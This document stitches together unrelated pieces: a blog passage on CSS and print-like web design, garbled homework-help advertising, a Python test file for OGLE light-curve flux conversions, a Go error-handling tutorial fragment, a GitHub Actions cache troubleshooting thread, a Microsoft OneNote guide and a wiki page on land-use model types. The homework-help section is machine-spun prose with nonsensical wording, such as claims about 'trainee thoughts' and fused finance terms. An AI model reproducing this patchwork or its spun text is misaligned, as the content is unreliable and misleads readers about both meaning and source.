Launch your localhost server and then navigate to “http://localhost/phpmyadmin/” URL on the browser address bar. Click on the export button and download the database in a compressed “zipped” or “gzipped” SQL format.
Step 3 – Creating New Database on Live Server
Login to your live hosting account and navigate to “MySQL Databases” section. Create a new database with the same name as your localhost database. Add a new user and add the database to the user. Learn more on creating a database in Bluehost hosting account.
Remember the username, password and database name which need to be used in step 6.
Note: You can also create a database under phpMyAdmin but username, password and assignment to be done from MySQL Databases section of cPanel hosting account.
Step 4 – Importing Local Database to Live Database
Once the live database is created, again go back to “Import” tab under phpMyAdmin section and upload the local database from step 2 to your live server.
Step 5 – Replacing the Links
Now that you have uploaded the local site files and local database to your live server. But when you create local site the URL will be starting with “http://localhost” hence you need to replace all the occurrences of the localhost URL with your live site URL.
Under phpMyAdmin section of your live server, go to “SQL” tab and run the below query.
UPDATE wp_options SET option_value = replace(option_value, 'http://localhost', 'https://www.yoursitename.com') WHERE option_name = 'home' OR option_name = 'siteurl'; UPDATE wp_posts SET post_content = replace(post_content, ' http://localhost ', ' https://www.yoursitename.com '); UPDATE wp_postmeta SET meta_value = replace(meta_value,'http://localhost',' https://www.yoursitename.com ');
This query will replace all localhost URL with your site URL.
Step 6 – Modifying wp-config.php File
If you try to open your live site, you will probably see an error message “Error establishing database connection”. The reason could be that the database username and password are not correct. Generally the database name and password on localhost are same as “root” but you might have created a different name in step 3.
Locate the file “wp-config.php” under the root of your live server installation. Open the file on editor and provide the correct username and password against “DB_USER” and “DB_PASSWORD”. Also ensure the “DB_NAME” is the name of your database you have created in step 3. Save and close the “wp-config.php” file. Check out separate article on editing wp-config.php file.
Now that you have a database, username and password which are correctly configured in WordPress configuration file.
Warning: If you change the database name in wp-config.php file, ensure to rename the database under “Operations” tab of phpMyAdmin.
Step 7 – Verify Live Site Content
Login to your WordPress admin dashboard with the URL “http://yoursitename.com/wp-admin/” using the same username and password details of your localhost. This is NOT your database username and password as you created in previous step 6, it is the username and password of your WordPress installation you might have chosen during localhost installation.
You will be able to see all the posts and media files as you created on your localhost.
We strongly recommend you to keep a local copy of your live site. This will help you to move the content to live server when required. Also, you can do the updates and testing on the localhost and then deploy in production server without facing problems. Alternatively, you can create a staging site to clone your live site on the server. In this way, you can keep a copy on the server to test and push changed to live site quickly.
|
OPCFW_CODE
|
You can use the WordPress eStore plugin to make squeeze page type pages to collect emails and build a list for email marketing. According to Wikipedia – “Squeeze pages are landing pages created to solicit opt-in email addresses from prospective subscribers”.
Why Should You Use The Squeeze Page Form of eStore Plugin?
There are many reasons but the following is an example of the most obvious one. If the following sounds like you then this page has your solution:
I want to allow a customer or visitor to my website to get a free download of my digital content (e.g a pdf or mp3 file). Right now I use a widget from my Autoresponder (e.g MailChimp, AWeber) on my WordPress site and the website visitor gets directed to a download area that is not encrypted or secure and though the stuff is free, I do want to capture an optin to my mailing list in exchange for the free stuff. I don’t want the link to be passed around or be posted to a forum.
How it works?
You use a shortcode in a post or page to display a form that lets the user download a free product (eg. an ebook or a mp3 file) after they fill in their names and email addresses. Once the visitor fills in his/her details (name and email address) and hits the ‘Download’ button the plugin sends an email with the encrypted link that can be used to download the product. The plugin adds the name and the email address of the visitor in the customer database.
How to Add a Squeeze Page Type Form in a Post or Page
Add a new product to your products database using the ‘Add/Edit Products’ menu. (Don’t forget to fill the ‘Button Image URL’ field when you add the product. this image will be shown as the ‘download now/Get Now’ button. The plugin comes with a download button (download_icon.png) that is stored in the images directory of the plugin)
Squeeze form shortcode
Use the following shortcode where you want to insert a squeeze form on your site:
5 is the product id of the product I configured. Below is the form that you get when you add the above shortcode in a post, page or sidebar of your site.
Can I Signup the Users to My Autoresponder List?
When someone submits the squeeze form, the name and email gets added to the the customer database of eStore plugin. You can optionally add the user to your Autoresponder (AWeber, MailChimp, GetResponse) list too.
If you want to signup the users to your Autoresponder list, you can do that by enabling the option in the plugin settings. It works like the following when you enable this option:
- A user comes to your site and visits the page where you have a squeeze form
- The user fills in the name and email address field of the squeeze form
- The details is captured in the customer database record of the eStore plugin
- The user also gets signed up to your autoresponder list
Creating a Stylish Squeeze Form Easily
You can use our stylish squeeze form addon plugin to create a nice looking opt-in form easily.
How to Redirect Users to a Thank You page After Squeeze Form Submission
Edit the product in question and specify the “Thank You” page URL in the following area of this product:
Buy Now or Subscription Type Button Specific Settings -> Return URL
When a user fills in the squeeze form for this product, he will be redirected to the URL you specify in the above mentioned field.
How to Use the Squeeze Page Type Form from a PHP file
To use the squeeze page type form from a PHP file (eg. the sidebar.php) use the following PHP function:
or the following for the normal one
So the following line of code will add a squeeze type form for a product who’s product id is 5:
or the following for the normal one
Using an Ajax/JQuery Powered Squeeze form
You can only put one Ajax powered squeeze type form in one page though. So if you want to put multiple forms (one in header, one in footer, one in sidebar etc) in one page then don’t use this option.
To use the Ajax powered squeeze page form, use the following shortcode/trigger text in a post or page:
5 is the product id of the product I configured. Below is the form that you get when you add the above shortcode in a post or page… feel free to put your details to see out how it works
How to Add CSS style to the Squeeze Page Form
The squeeze form is written in a div class named “free_download_form”. Simply add the style definition to the ‘wp_eStore_style.css’ file to add styling to the form. For example, the following will add a background image to the form:
Note: We now provide technical support for our premium plugins via our customer only support forum
|
OPCFW_CODE
|
Bug#436093: Please decide on the "ownership" of the developers reference
* Ian Jackson (email@example.com) [070805 18:27]:
> It seems clear to me that Andreas wants to be the primary maintainer
> and to reserve the authority to make changes, grant commit access,
> etc. Andreas: do you have any assistants/colleagues/etc. who would be
> willing to help you with that so that you don't become a bottleneck ?
What I consider important is that someone goes through all open issues,
and checks them (which doesn't always result in comments) - I think that
any package just needs this kind of clean up being performed. And as I'm
doing the cleanup since more than 2.5 years, I want to have a big enough
influence on what I need to clean up.
Currently, I have good work relationship to Wolfgang Borchert for the
docbook-transition, and to two translators (even though only French is
enabled currently). There are a few regular bug reporters (like Frank)
who I think I trust enough for committing by themself, but this topic
hasn't be raised.
In case it becomes obvious I am the bottleneck for this package (which
of course includes trying to get me working on "obvious applicable"
stuff before) I'm always happy to hand over lead maintainership (which
inludes in my opinion the obligation to either go through the open
issues, or make sure someone else does it) to someone else - in case
Marc Brockschmidt and Martin Zobel-Helas agree that I need to transfer
it, I will do so even if I disagree (which is just the default for any
of my Debian work - I trust both of them enough that they can together
make decisions for me if necessary). (But BTW, in case I would notice
someone is regularly feeding good patches to me, I think I would rather
make sure that person could actually commit, and would even trying to
get DSA to make the necessary group changes, and happily hand over lead
> I'd also like each of you to answer: if the TC rules in your favour,
> how do you plan to deal with your opponent in this dispute ?
Basically, I don't see Raphael as opponent, but as having a different
opinion on how the commits should be done. And I think it is important
to have a decision because it avoids further grumblings, and we can work
out how we can continue working on it - we need a common starting point.
(In other words, if I could vote, I would vote "further discussion"
In case the TC decides I'm still the lead maintainer, I would like to
try to find out if there is a procedure that still satisfies my quality
requirements, and will allow Raphael to contribute in a way he likes.
Somehow, I am currently quite annoyed (which is perhaps not best but
natural), but I'm optimistic we can still work out something which is ok.
(That's basically not different from any other package or area I'm
Unfortunatly, that can't be done now, because as long as Raphael insists
in having the exactly same say as I have, we won't find such a procedure
(because the procedure needs to violate that wish).
> Another possible way for the TC to decide on this kind of question is
> to ask the developers to each prepare a package and then for the TC to
> choose between them. Do you think that would be appropriate in this
> case ? Would it be a fair fight ? How long would you need ?
I don't think it is appropriate for a couple of reasons (besides it
being a waste of time), because:
1. at the moment something is commited to CVS, the changes are already
active on the website;
2. this is not a classical package - basically, it is only a large
xml-file that is really relevant;
3. the next important aspects are to make the docbook transition active
on the webpage, which includes writing some scripts for the website
Actually, I think I wouldn't take part in that, but rather go away from
maintaining the developers reference, and let other people do the time
consuming and unpopular tasks - it is not that I have too less to do
inside and outside Debian.
|
OPCFW_CODE
|
I’d come across this website and thought it was quite interesting. You could put polylines, lines and markers on the map and get the output in geoJson format. So this could be read with a bit of coding and displayed on a map on a website.
I have just been having a wee tinker around with it, and grabbed some basic script for displaying a map on Importing Data into Maps from Google Maps and have been testing it. The code from Google Maps is about displaying Markers only and also no data that you put into the markers, but it shows the principle works.
The file that it calls is earthquake_GeoJSONP.js , so not a . geojson file, but if you look at the original file here which displays in the web browser in Raw, youi’ll see its just a geJason file with:
eqfeed_callback( geojson file); and then called a .js file.
So, that is pretty good. You can use geojson.io to set up the features that you want on the map and then get the geojson data file to be able to display. You’ll need to do some extra coding to be able to display the data that you want, but you have the data in the file to be able to display.
The help data is pretty handy. There is a nice feature with CSV import/export. Where you can load a CSV file. It has a couple of things you need to be aware of.
On the Markers, Lines, Polylines & Rectangles you can add extra Properties by “ADD ROW box at the bottom, to add more Data about a feature. This is good. You can then save to a CSV and then add all these new properties to all the other MARKERS (only) and bring thenm back into geojson.io .
External Geojson to CSV converter
I took the geojson and used an online converter to change it to CSV. The idea being that you could add lots of extra features to markers or polyline features more quickly in a CSV format.
It structures the data very nicely. Here it is saving the polyline, the lines and the marker feature.
Using Open> File > xxx.csv and bringing in the file it doesn’t brings anything in with the data that I have converted using the online convert method. This is because the CSV interchange in geojson.io only works with points. So markers are fine. Also if you go Save> CSV it will only save the points (Markers).
Once I cleaned out the polylines and lines from the CSV and only had the points(markers) it loaded with no trouble.
A couple of other features I want to mention. In bottom left corner there is selection of map types that you can choose. Mapbox & satellite were the only ones that worked for me.
In the Feature (Poly-line, rectangle, Line) there is another tab that gives dimensions in metric and imperial. When I looked at the CSV file, this data was not part of the output. I wonder if there is a way to access it? The only way I can see to capture this data is to create in properties add row and cut/paste the data into it.
Also, in the table tab (see screenshot below) there is a new column button to add new columns to add more data. A nice feature.
There is also an API to connect to. I haven’t tested this, and will need to play around with it to see what it may be used for. Another day.
My initial reaction to this was its a really handy way to get lots of locations quickly. In Google maps you need to drop an icon then get the coordinates and copy them to where you are storing all the data.
This website lets you draw lines and poly-lines and drop markers onto maps and quickly get the json file. You can always add different marker icons, more data and different colours to your information once you have all the coordinates. Then using CSV or Excel or Sheets to do all the formatting or to push in extra data. This can then be pushed into a Database Table for exercises like the changing size, colour and symbols for condition over time on maps.
|
OPCFW_CODE
|
I don't think I am going too far out on a limb when I claim that our CIO role is one of the most challenging in any organization. We have to achieve two sometimes competing, sometimes complementary goals, all while supporting every known internal and some external business processes. The two at-odds goals are these:
- Getting an organization's IT house in order by ensuring quality, cost-effective delivery of services.
- Exploiting technology to enable an organization's strategy.
In trying to achieve these two goals, I have found it necessary to pick my battles carefully and wherever possible, to minimize risks and costs by reusing what I or others have developed and proved already. For example, I did not invent the production change process that I use. Instead, I simply mimic the process that others have used successfully for years. As a CIO, inventing a technology or process carries a certain risk and cost that I sometimes am not willing to pay.
I take this approach with business applications also. I cannot imagine a scenario in which it would make sense for my software development team to create a general ledger or word processing application. Someone has done that work already, and I will reuse their code by buying their applications. That leaves me and my development staff to focus our work on the applications that are so specialized that we need to do the work ourselves.
This is work I have always been happy to take on. Given the choice, however, I would still prefer to find and reuse what already works -- even for these specialized applications. Say what you will about cloud computing being the latest in a long line of IT buzzwords, it still seems that cloud computing is making my software reuse dream more of a reality. Let me describe something we can do today.
We decide to use a cloud environment for our software development. To be used by multiple, disparate users, this cloud environment must support a defined set of technological and architectural standards. In selecting this cloud environment, we are choosing to use these standards. Because everyone else using this cloud environment also chooses to use the same standards, there are opportunities for reuse.
Cloud computing news
Suppose I want to build a cloud-based application to manage my highly specialized sales quotes. My process, while generating highly specialized quotations, actually consists of some fairly standardized business rules. For example, my quotation review and approval workflow process is no different from what others do. Now, what if someone else already has created -- also in the cloud environment -- a workflow system for reviewing and approving sales quotes? Then I have something I can reuse rather than create. I still might need to develop portions of my system, but if I can use what someone else has created and proved already, I can reduce my costs and risks. By joining and tapping into the community of cloud environment users, I might be able to develop better products at lower cost and with fewer risks.
Of all the talk about cloud computing, the ability it gives me to access highly specialized but common applications might be an aspect of cloud computing that best helps me reach my two IT leadership goals: achieving operational excellence and enabling strategy.
Niel Nickolaisen is CIO at Western Governors University in Salt Lake City. He is a frequent speaker, presenter and writer on IT's dual role enabling strategy and delivering operational excellence. Write to him at email@example.com.
|
OPCFW_CODE
|
Telling a snake’s gender is not as easy as looking at the snake and saying oh, it’s a female or a male. Snakes do not have any indicators of their sex that are accurately visible, like humans and other animals.
You can only tell a snake’s true gender by examining the snake’s inner organ or structure.
As a snake owner, you may be uncomfortable probing or popping your snake. There are a few species that are common pet snakes that may help you avoid sex-confirming methods.
I breed snakes, so I don’t have the option of using the following gender determination options.
However, if you’re not interested in breeding and just want to know what your snakes’ gender is one of these options should work for you, assuming your pet snake is the right species for these non-invasive indicators.
How to Tell a Snake’s Gender?
Non-invasively, you can tell a snake’s gender by looking at its pelvic spurs size, tail shape, and body size. However, there are only two sure ways to identify and confirm the gender of a snake – by popping or probing the cloaca, both of which are invasive.
Pelvic spurs seem to be tiny projecting bone spurs seen near the cloaca on snakes.
These are the last vestiges of legs. Spurs really aren’t found in all species of boa and python, although they can be found in the majority of them.
The size of spurs can be used to determine the gender of some snakes who have spurs, such as boas.
Male boa constrictor spurs are significantly bigger and more noticeable than female spurs. Female boas can be completely devoid of spurs.
Gender can’t always be determined by looking at the spurs in certain snake species. Female pythons, for instance, can develop spurs as large as males.
The tails of females and male snakes are slightly different due to variations in their anatomy. The distinction might be obvious (as in hognose snakes or subtle, as in ball pythons.
The tails of male snakes are longer than those of female snakes. Their tails likewise taper (thinner) with time. Females’ tails are shorter and suddenly taper after the cloaca.
Their tails must be long enough to accommodate their hemipenes. The cloaca is where a snake’s tail originates. To inspect its tail, do the following:
- Hold the snake so its belly is facing you to observe the cloaca.
- Find the midpoint between the snake’s tail tip and its cloaca. Do this stretching out your snake’s tail.
- Observe the snake’s midpoint thickness. If the snake’s circumference at this stage is far less than 50% of its diameter at the cloaca, it’s most likely a female. It’s a male if its more than 50%.
- You may also count the number of subcaudal scales before the tail begins to thin. It’s most likely male when there are more than six scales.
Size of the Snake
According to animal behavior, it’s typical for the female serpents to grow bigger than their male counterparts. Scientists believe it’s because bigger females may produce larger eggs and babies.
Survival rates are greater with larger juvenile snakes.
Sexual size dimorphism exists in boas and ball pythons. Females grow significantly larger in adulthood than males, despite the fact that their babies are the same size.
A Snake’s Cloaca
The cloaca, which is found on the snakes’ underbelly at their tail base, is present in both female and male snakes.
The cloaca has two functions: snakes use it to pee and defecate, and it also houses its sexual organs.
When the male’s ready for mating, his hemipenes emerge from the cloaca before inserting it into the female. More information about snake reproduction may be found below.
Female and male cloacae appear to be identical on the outside, yet they are not. The inconsistencies can only be noticed internally, thus adds to the complexity.
There are 2 ways for you to determine all the discrepancies.
It is recommended that only experienced snake keepers undertake either of these approaches. If you’ve never popped or probed a snake, you should get assistance from a veterinarian or herpetologist.
If you measure the snake, you might be able to determine if it is a male or a female. This strategy isn’t for every single snake, though.
When it comes to some snake species, such as colubrid, the size of the male and female are nearly the same. In certain species, such as rattlesnakes, males grow to be far bigger than females.
Cloacal popping is the process of physically attempting to evert your snake’s hemipenes with the help of your thumb.
If there are no hemipenes on your snake, it is most likely a female.
- Ensure that the snake’s belly is towards you while you search for the cloaca.
- Your thumb should rest on the snake’s tail, close to where the cloaca is located.
- Apply gentle pressure to your thumb as you “roll” it towards the snake’s cloaca. Hemipenes will pop out, which means that the snake is a male.
Although it appears to be simple, popping is really rather difficult to master.
It is simple to apply much more pressure, not quite enough pressure, or stress in the wrong spot, such as too far away from or too close to the cloaca.
Some people make the mistake of identifying their snakes for females simply because they haven’t mastered the popper method.
Some people make the mistake of identifying their snakes for females simply because they haven’t mastered the prober method.
The process of identifying the snake’s sex is basically the same. You need a special kit with a thin probe that is inserted into one of the thin holes near the cloacal.
This method is more complex and, unless you are experienced, it should be done by a professional.
Frequently Asked Questions about How to Tell a Snake’s Gender
How do you probe or pop a snake without getting bit?
The first and safest way to pop or probe your snake if you’re afraid it will bite you is to take it to a vet or have a herpetologist do it. If that is not the way you want to go, then have a partner hold the snake gently with one hand on the mid-section and the other supporting its neck while gently wrapping their hand around its mouth so it cannot open it. Be very gentle. You only want to keep the snake’s mouth from opening. If you put too much pressure on their neck you will cut off their oxygen, and they will stop breathing.
Does it hurt the snake to pop or probe it to find out its gender?
If you do it properly, popping or probing doesn’t hurt. But, if you’re unsure of steps or aren’t comfortable performing it, then do not do it! Have a vet or herpetologist do it for you.
I personally like to know the gender of my snakes and, of course, it is necessary for the ones I breed.
When I first started breeding, I had a herpetologist work with me and show me the proper equipment, handling, and technique because I was uncomfortable just diving in with little to no knowledge.
Do what makes you comfortable and what’s best for your pet snake.
|
OPCFW_CODE
|
Code of Conduct
MossRanking is a collective of individuals dedicated to creating a healthy and inclusive space for Spelunky players to collaborate, communicate, and compete with one another. The care and consideration of the community is what keeps MossRanking moving forward. To continue to ensure the community is as healthy as possible, we encourage all participants to understand and abide by the following Code of Conduct.
- MossRanking is an inclusive community and welcomes individuals of any identity, orientation, and ability. We do not condone exclusionary behavior or hateful speech towards others.
- MossRanking is run voluntarily by community members who have dedicated time, energy, and finances to keep things running smoothly. Please understand and respect these efforts when discussing ideas.
- There is a person behind every screen. We should always aim to be understanding and empathetic towards others, even when differences in opinion arise.
- Harassment within the boundaries of the community will not be tolerated. While MossRanking does not oversee all private and public spaces involved, we uphold a duty to minimize any potential harm that could befall members of the community, even in places of privacy.
- MossRanking operates with some expectations of adherence towards the contents of Spelunky and its design. We aim to accommodate a variety of categories and features for the community, but will encourage such additions to remain faithful to the game itself. Exceptionally specific ideas, or ideas that deviate from and/or modify the game’s design will be met with greater scrutiny.
- MossRanking is run by the community and for the community. While some dedicated members have been given privileges to direct discussions and decide certain outcomes, they are expected to adhere to the best interests of the community first and foremost.
- MossRanking is always evolving. While we aim to be steadfast in meeting the needs of the community, some unavoidable burdens will fall upon the technical or cultural sides of development. Please be considerate of when these difficulties arise.
3. Fair Play
- When participating in MossRanking leaderboards, players are expected to read and understand the rules of each game and category documented on the website. Misunderstandings, should they arise, should attempt to be resolved through communication with other community members.
- Barring some significant circumstances, the deletion of runs is generally frowned upon and should be avoided. This is especially true of current and former world record runs, as the website aims to document these runs as well as rate all other runs relative to them. While you will never be forced to submit runs, please do so with the intent to have them remain on the website. On some occasions, publicized world records may be posted to MossRanking on behalf of an individual outside the community. Such runs can be removed if requested by the individual.
- When competing within the MossRanking community, competition should remain friendly and uplifting. An individual's profile, personal bests, or run preferences should never be used as an excuse to spur negativity towards others. We should always seek to be gracious and encouraging of others, even when their runs may surpass our own, to ensure that the competitive environment is welcoming to anybody involved. Lifting others up will always be more rewarding than tearing others down.
Violations of the Code of Conduct will be reviewed by MossRanking moderators and governors to determine the most appropriate actions moving forward. In most cases, any misunderstanding or violation of the above will result in a warning to the individual in question. Significant and/or repeated instances may lead to removal from our community Discord server and MossRanking itself. If you see or experience any violations of the above statements, do not hesitate to reach out to trusted community members to report them. Such reports can be anonymized if preferred.
You can report issues that stem from:
- MossRanking Discord
- Spelunky Discord (aka Speedrun/Community Discord)
- Spelunky 2 Discord (aka Official/Developer Discord)
- Any community involved Discord servers (public or private)
- Community and MossRanking events
- r/spelunky Subreddit
- Social media websites (Twitter, Facebook, etc)
- Content platforms (Twitch, YouTube, etc)
- Direct messages
If you see or experience any violations elsewhere that still are relevant to the community, we encourage you to report those as well. The list above serves as a guideline.
When issues arise, it is important for them to be addressed appropriately and timely. In many cases, we rely on communication from the community to be able to meet these expectations. As such, we encourage you to be ready and prepared to reach out to moderation.
Visit the Staff page to learn about who you can contact about any issues.
Consider joining the MossDev Discord server to keep up with development, report bugs, and request communication with a moderator.
|
OPCFW_CODE
|
Win2K SP4 News
I heard from Tony Pedretti, one of the Windows 2000 Service Pack 4 (SP4) beta testers, this week and wanted to pass along his comments. As of June 18, beta testers are working with the second refresh of the SP4 release candidate. Pedretti is testing the service pack on workstations in a non-Microsoft network environment. Overall, he’s pleased with the current version, giving the update a rating of excellent. According to Pedretti, the second refresh eliminates slow application performance and shutdown problems present in the first cut and said the SP4 beta forum has posted no new bugs during the past few weeks. Even better, he said, “Microsoft has not given us a hard date for release (i.e., The 'It'll be released when its ready' stance). Feedback from the tester’s forum and third-party beta sites like neowin.net are hinting at the end of June as a possible release date.” Let’s hope Microsoft holds to the “release when ready” position so that we don’t have to deal with post-SP3 hotfixes that are incompatible with SP4, security hotfixes that break, and a host of other unnecessary problems such as the remote procedure call (RPC) problem I discuss next. As a point of information, Microsoft has admitted to 45 post-SP4 hotfixes as of today, including the Print Spooler failure I discuss later.
RPC Bug in Hotfixes and IIS Security Rollups
This bug is important for ISPs and Web developers working with Active Server Pages (ASP) code that manipulates COM objects. A bug in how Win2K implements local RPC calls can cause threads that manipulate COM objects to hang. According to Microsoft, the bug occurs when local RPC calls are made from multiple threads, specifically when each thread has a different set of security credentials. There are two symptoms associated with the RPC problem. First, because the thread hangs, http clients time out when accessing ASP pages that manipulate COM objects. Second, two performance counters, Requests Executing and Requests Queued, increase over time and never return to zero, even when the Web server is idle. The bug exists in 11 post-SP3 hotfixes, and according to some news groups, is also present in the Microsoft IIS security rollup "MS03-018: Patch Available for Denial of Service Through FTP Status Request Vulnerability" (http://support.microsoft.com/?scid=317196) that the company released just last week. If your ASP application manipulates COM objects, this bug might explain unexpected behavior. Likewise, this problem will show up after you install any of the patches listed in the Microsoft article "FIX: RPC Bug Causes Threads to Stop Responding in ASP/COM+ Applications" (http://support.microsoft.com/?kbid=814119) and after you install the security hotfixes described in Microsoft Security Bulletin MS03-010 (Print Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks) and possibly Security Bulletin MS03-018 (Cumulative Patch for Internet Information Service). This problem might be a packaging matter (e.g., we forgot to put in the latest version of the RPC library) because the release date of the RPC library component that corrects these problems predates several of the hotfixes. Although the documentation doesn't specifically state that the RPC bug is present in the most recent IIS security rollup, a rollup is cumulative, so this update is also suspect. If you’re experiencing problems with ASP pages and COM objects, you might need the new version of the RPC runtime library. Call Microsoft Product Support Services (PSS) and ask for the RPC patch, rpcrt4.dll, with a release date February 3, 2003, and version number 5.0.2195.6661.
Print Spooler Bails Out
Here’s a relatively new print spooler problem that occurs on the server hosting a network printer. If you configure the network printer port to use the RAW data type and you print multiple copies of the file, the spooler might choke and automatically restart. When this happens, you’ll see entries in the System event log with event ID 7031 and a message stating “The Print Spooler service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 600000 milliseconds. Restart the service.” According to the Microsoft article "Spooler Service Quits When You Submit a Print Job and an Event ID 7031 Message Is Logged in the System Log" (http://support.microsoft.com/?kbid=820550), the bug is a result of a coding error that occurs when the spooler service needs to allocate a larger buffer; instead of increasing the buffer size appropriately, the code resets the buffer size to zero (tee hee!). The fix consists of three files, localspl.dll, spoolss.dll, and win32spl.dll. All three files have a release date of June 11, and you can get the update only from PSS. This is one of the 46 pre-SP5 bug fixes, and you can install it only on SP3 systems.
When the Keyboard and Mouse Disappear
Have you ever hit the keyboard one too many times or jiggled the mouse repeatedly when waking up a notebook that’s in standby mode? Then, when the system wakes up, you discover that the keyboard and mouse aren't working. This problem is a known bug in Win2K, and a patch is available—a new version of I8042prt.sys with a file release date of April 22. This fix, categorized as a pre-SP5 fix, can be installed only on Win2K SP3 systems. Call PSS and cite reference article "The Keyboard and Mouse Do Not Work When You Resume from Standby" (http://support.microsoft.com/?kbid=818383).
|
OPCFW_CODE
|
Warning: Possible readers who can appreciate this post are engineering and math majors who need calculator techniques for the board exams. Numbers and equations are involved. 😛
A few days ago, I got an email from a civil engineering student in Pangasinan. He asked me this question:
“I’ve read in your website that you are sharing tips for engineering board exam.. I’m so grateful to see people who share their knowledge and experiences to other people. I’m very interested to know some calculator techniques in solving problems in engineering mathematics like calculus using fx-991 es.. can you share some to me? thank you so much!”
Thanks so much for this emailed question! Keep the questions coming, board exam related or not, because I really accommodate what you guys want to read here next.
I already made a post on calculators as part of my series of board exam tips in this blog. But the techniques were not posted because I was too lazy at the time. LOL. I am not really much of an expert in maximizing this calculator model, but there were some tricks that I found useful.
One of the best advantages of using Casio ES 991 is the Natural Display. It looks exactly as one would write the equation on paper:
I strongly advise you to read the Casio ES 991 manual before you experiment with the techniques. I know, it’s like I am asking you to drink acid with this tip, but trust me, it works! For one, I learned from that long manual that you cannot use the derivative and integral function button in certain equations.
So many calculator users may rely too much on the results produced by the integral and derivative buttons of this calculator. But you know what? The algorithm used on the ES 991 calculator for derivatives and integrals is heavily based on a fair mathematical approximation (according to the manual!), and bound to fail in certain types of equations. Be careful. When I took the board exam last year, the only difference between me and the top 1 of our board exam was roughly around five questions. Every item counts.
Also, be consistent with the angle usage. Check if the mode of your calculator is properly set to degrees or radians. I heard of a tale of one board exam taker who was computing in degrees but her calculator was set to radians the whole time. She panicked during the exam because her answers were not found in the multiple choices given. She got to fix this minor error about 30 minutes before time was up. She still passed, because she is very intelligent, but that is truly a source of additional stress, if you ask me.
I already said something about the SHIFT + SOLVE function in the previous post on calculators, so I will not repeat them anymore.
I frequently used the CALC button, especially when I am forced to repeat an equation over and over again for different values. This is very common in long engineering problems.
For example, you need to find y for 5 values of x, and the equation is y = x + 5. I am using basic equations here just so you get the principle. For example, the given values for x are 1,15,25,30, and 16.
Manually, you will have to type in “1+5”, “15+5”, “25+5”, “30+5”, and “16+5” separately to get the 5 y values you need. That’s just too mechanical, and a complete waste of board exam time.
Using CALC, you can just use any of the variables in the calculator (A,B,C,D,X and Y are all usable for this purpose). Just type in “X+5” and press the CALC button and the equal sign. You will be prompted by the calculator to give the X values without having to type the formula over and over again. And since you can all use A, B, C, D, X, and Y, you can get values with as much as 6 variables without having to hurt your fingers.
Just be careful not to store important constant values in A, B, C, D, X, and Y when you are using it for CALC. Chances are, the values you stored will be deleted as you use the CALC button.
There are 8 modes in Casio ES 991.
Mode 1 COMPUTATION
This mode is the default mode for calculations and this is where most of your computations will occur.
Mode 2 COMPLEX
The complex mode is hardly used in my major, geodetic engineering. But we did have need to convert Polar to Rectangular coordinates in computing for lot data. I got this technique from Engr. Machele Felicen, who was our Top 1.
We just enter A<B + CALC
It will ask for the values of A and B (A is the r, B is the theta).
Then the answer it will produce is something like this:
1.45365444 + 3.4567i
The first term and second term are the rectangular coordinates (x,y) already.
That saves you helluva lot of time than when you use the one given by the Casio manual for converting (r, theta) into (x,y).
Mode 3 STAT
I did not get to use this much during my exam because we geodetic engineers are more inclined to geometry and calculus. But based on what I have seen so far, you can do so many things for Statistics with ES 991. And the natural display will easily show you the list of the values. It was unlike my old calculator where you have to scroll down a lot and punch a lot of buttons before you get to each n value.
Mode 4 BASE-N
BASE-N…I did not get to use it at all. LOL. Sorry.
Mode 5 EQUATION
Mode 5 was one of my favorites during the board exam. It allows you to get the values for 2 equations, 2 unknowns and 3 equations, 3 unknowns. It also will help you get the quadratic and cubic roots of an equation. They are most useful. All you have left to do during the exam is to reduce all the complex equations into any of these four forms and then you are super done with it. 😉
During our review class, there was one challenging math problem with 9 equations and three unknowns. That’s hell if you do it manually. Simplification was vital. I just reduced it to three equations and used Mode 5 and I got X, Y, and Z in less than 5 minutes. 😀
Mode 6 MATRIX
Matrix operations were pretty common, too. Too bad it can only handle 3 by 3 matrices at the most. But you can store up to three matrices and work with them without having to type the matrices over and over again.
Mode 7 TABLE
In my initial example for CALC, I used different X values which are far from each other in the number line. But what if the x values are within an interval and is equally spaced? For example, the X values are 1,2,3,4, and 5. The Table mode is ideal for values like these.
This TABLE mode will instantly prompt you to give an expression for f(X).
It will ask you where the X values will start (“Start?”) and end (“End?”). It will also ask the interval between the values (“Step?”). In the example’s case, Start is 1, End is 5 and Step is 1 unit.
For its output, the calculator will yield a table containing all the values that you need, showing both X and F(X) as you would see it tabulated on paper, thanks to natural display.
(Note: I tried using variables A, B, C, D, and Y for Table mode, but I believe it only works when you use the X variable.)
I also use the Table Mode when I have a hard time visualizing a certain function. I just choose a reasonable interval of values, plug the equation and I sketch the table of values on a scratch paper so that I have a better vision of the equation’s physical properties.
Mode 8 VECTOR
If you need dot products and dim, you can use this mode. It can hold three-dimensional data (X,Y,Z), even. I have not used it too much. I think it will be more useful for Physics classes than in Math board exams. 🙂 I leave the physicists to enlighten you on the matter.
My reader explicitly asked about Calculus techniques. For this, I believe ES 991 poses you with a tiny limitation. It will only get you derivatives and integrals for those with absolute numerical values. This means, you ought to have upper and lower limit values for the integration function. In college, this function may be a bit useless because you will need to solve calculus problems by hand if you really want to master the theorems and get a good grade in your class. Don’t do too much shortcuts in college at the expense of learning the principles. But during board exams, where there are application-focused problems likes Maxima-Minima and Related Rates, you can definitely take advantage of the derivative and integral buttons. 😉
Do use the calculator everyday, even for small things like your shopping list. It allows you to get used to the calculator buttons. This, in turn, improves your manual dexterity and speed in using the calculator. Make sure you have enough batteries. At the time of my exam, I replaced the batteries 2-3 days before the actual exam and I had a spare calculator of the same model in case my original calculator breaks down somewhere during the board exam.
It takes a lot of practice to learn shortcuts. And it saves time in getting you from point A to B during an exam.
But do make sure that you know the long methods before you play around with the shortcuts. I am totally not encouraging that you rely purely on shortcuts to pass the exam. The complete comprehension of the concepts is very, very important.
If you have other calculator tips for our dear readers, this post is open for discussion and comments.
Did you find this post useful? You can click any of the share buttons below (Facebook, Twitter etc.). I have shared my techniques freely to you, so pay it forward and let’s help some more people get their licenses.
(You can also show me some love by subscribing via email for updates at the right side bar of this page. However, I blog about many things, so my posts are not just limited to board exam posts. This brain likes variety so much. :-P)
|
OPCFW_CODE
|
Then we all got jobs, or clients, and for most people their reference point for design was print. As we were handed Photoshop comps that couldn’t be built with the tools we had we responded with our new mantra, “the web is not print”.
- More than 216 colours? The web is not print!
- A choice of fonts? The web is not print!
- Equal height columns? The web is not print!
- Centre that box? The web is not print!
We got good at building our not-print web. This is how it is. These are the limitations. The web is not print. We rolled our eyes at the print designers, “they just don’t understand the web!”
